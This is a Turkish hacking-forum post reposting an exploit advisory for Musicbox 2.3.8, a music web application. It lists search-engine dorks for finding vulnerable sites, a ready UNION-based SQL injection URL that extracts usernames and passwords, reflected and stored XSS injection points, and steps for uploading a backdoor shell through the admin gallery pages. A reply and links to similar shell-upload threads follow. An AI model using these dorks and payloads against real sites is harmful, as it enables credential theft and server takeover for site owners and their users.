Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Müzik Kutusu 2.3.8 SQL,XSS,Shell Açıkları
#1
Kod:
#Exploit Title      : Musicbox 2.3.8 Multiple Vulnerabilities
#Author         : DevilScreaM
#Date           : 25/08/2013
#Category       : Web Applications
#Vendor                 : http://www.musicboxv2.com/
#Version        : 1.0 - 2.3.8

#Dork      
intext:Musicbox Version
intext:Musicbox Version 2.3.8 © 2008
inurl:genre_albums.php?id=

#Vulnerability      : SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability
#Tested On      : Windows 7 32 Bit (Mozila & Chrome)
#Greetz                 : Newbie-Security.or.id
  

SQL Injection Vulnerability

http://site-target/genre_albums.php?id=[SQLI]

Example
http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--

==========================================================================================

Cross site scripting / XSS Vulnerability

*Search

1. Go To Fiture Search

2. Input your Cross Site Scripting, Example "<h1>Tested by DevilScreaM</h1>" , Click Search

3. See Result

or See with URL

http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0

Example

http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0


========================================================================================

*News Profile

1. Register To Website or go to link http://site-target/register.php

2. Login to Website

3. Go to Menu [ My News ]

4. At News Heading input your XSS, Example <h1>Tested by DevilScreaM</h1>

And at Detials input your XSS or Text

See your XSS at http://site-target/member.php?uname=[YOUR_USERNAME]

Example

http://server/musicbox/member.php?uname=devilscream


==========================================================================================

Shell Upload Vulnerability

*Artist Galery

1. Go to Admin Page, And Login

2. Go to Upload Artist Image or Go to Link

http://site-target/admin/adminpanel.php?action=artistgallery

3. Select Your Shell/Backdoor , And Click Submit

4. Result Upload At

http://site-target/artist_gallery/Your_Backdoor.php


============================================================================================

*Album Galery

1. Go to Admin Page, And Login

2. Go to Upload Album Image or Go to Link

http://site-target/admin/adminpanel.php?action=albumgallery

3. Select Option, Example Option "All Album", And Click Submit

3. Select Your Shell/Backdoor , And Click Submit

4. Result Upload At

http://site-target/album_gallery/Your_Backdoor.php

Kaynak =>
Kod:
http://www.exploit-db.com/exploits/27876/
www.deccal.org


Beğenenler:
#2
Eline sağlık
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Gov SQL Dorks Devlet Açıkları KingSkrupellos 247 11,942 24-11-2016, Saat: 13:02
Son Yorum: Trajedi
  WP Reflex Gallery Plugin Shell Yükleme Açığı KingSkrupellos 6 93 23-11-2016, Saat: 16:41
Son Yorum: ferdimeric
  WordPress U-Design Rasgele Dosya İndirme ve Shell Yükleme Açığı KingSkrupellos 7 125 21-11-2016, Saat: 23:10
Son Yorum: Efetimi
  WordPress Bordeaux-Theme Shell Yükleme Açığı KingSkrupellos 9 156 13-11-2016, Saat: 01:51
Son Yorum: zheeshorn
  NairaSolution Yönetici Atlatma ve Shell Yükleme Açığı KingSkrupellos 9 160 06-11-2016, Saat: 20:18
Son Yorum: tacsızhacker
Anahtar Kelimeler

Müzik Kutusu 2.3.8 SQL,XSS,Shell Açıkları indir, Müzik Kutusu 2.3.8 SQL,XSS,Shell Açıkları Videosu, Müzik Kutusu 2.3.8 SQL,XSS,Shell Açıkları Online izle, Müzik Kutusu 2.3.8 SQL,XSS,Shell Açıkları Bedava indir, Müzik Kutusu 2.3.8 SQL,XSS,Shell Açıkları Yükle, Müzik Kutusu 2.3.8 SQL,XSS,Shell Açıkları Hakkında, Müzik Kutusu 2.3.8 SQL,XSS,Shell Açıkları Nedir, Müzik Kutusu 2.3.8 SQL,XSS,Shell Açıkları Free indir, Müzik Kutusu 2.3.8 SQL,XSS,Shell Açıkları Oyunu, Müzik Kutusu 2.3.8 SQL,XSS,Shell Açıkları Download


1 Ziyaretçi